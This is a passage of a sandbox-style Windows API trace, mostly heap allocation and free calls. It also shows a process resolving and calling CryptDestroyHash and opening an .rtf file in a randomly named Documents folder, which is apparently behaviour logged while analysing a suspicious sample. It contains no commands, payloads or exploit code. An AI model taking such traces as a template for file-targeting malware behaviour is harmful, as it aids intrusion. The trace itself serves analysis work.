17 [0080.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796f48 [0080.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0080.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3a28 | out: hHeap=0x1780000) returned 1 [0080.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0080.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0080.758] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0080.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0080.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0080.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0080.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0080.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0080.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0080.758] CryptDestroyHash (hHash=0x41ac600) returned 1 [0080.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0080.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0080.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0080.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b00 [0080.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3980 [0080.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a58 [0080.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0080.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3a58 | out: hHeap=0x1780000) returned 1 [0080.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0080.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3980 | out: hHeap=0x1780000) returned 1 [0080.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c39b0 [0080.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b48 [0080.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c38d8 [0080.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c38d8 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b48 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3950 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3608 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c38c0 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b00 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c39b0 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0080.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0080.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0080.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0080.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0080.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0080.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0080.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0080.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0080.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35c0 | out: hHeap=0x1780000) returned 1 [0080.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3848 | out: hHeap=0x1780000) returned 1 [0080.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36e0 | out: hHeap=0x1780000) returned 1 [0080.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0080.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35d8 | out: hHeap=0x1780000) returned 1 [0080.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0080.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0080.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35f0 | out: hHeap=0x1780000) returned 1 [0080.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0080.760] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0080.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0080.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0080.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0080.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0080.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0080.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0080.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0080.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0080.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3590 [0080.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0080.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0080.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0080.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0080.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0080.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0080.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0080.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0080.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b60 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0080.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0080.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0080.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0080.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0080.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0080.764] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0080.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0080.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0080.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0080.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0080.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0080.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0080.764] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0080.764] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0080.764] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0080.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0080.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0080.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0080.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0080.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0080.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0080.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0080.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0080.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0080.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0080.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0080.765] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\bbYe6GX.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\bbye6gx.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0080.765] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.765] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0080.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0080.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0080.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0080.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0080.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0080.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0080.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0080.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0080.765] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0080.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0080.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0080.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0080.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0080.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0080.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0080.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0080.766] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0080.766] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0080.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0080.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0080.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0080.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0080.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0080.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0080.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0080.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0080.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0080.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0080.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0080.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0080.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0080.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0080.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0080.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0080.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0080.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0080.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0080.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0080.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0080.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0080.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0080.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0080.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0080.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0080.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4051040 [0080.768] HeapFree (in: 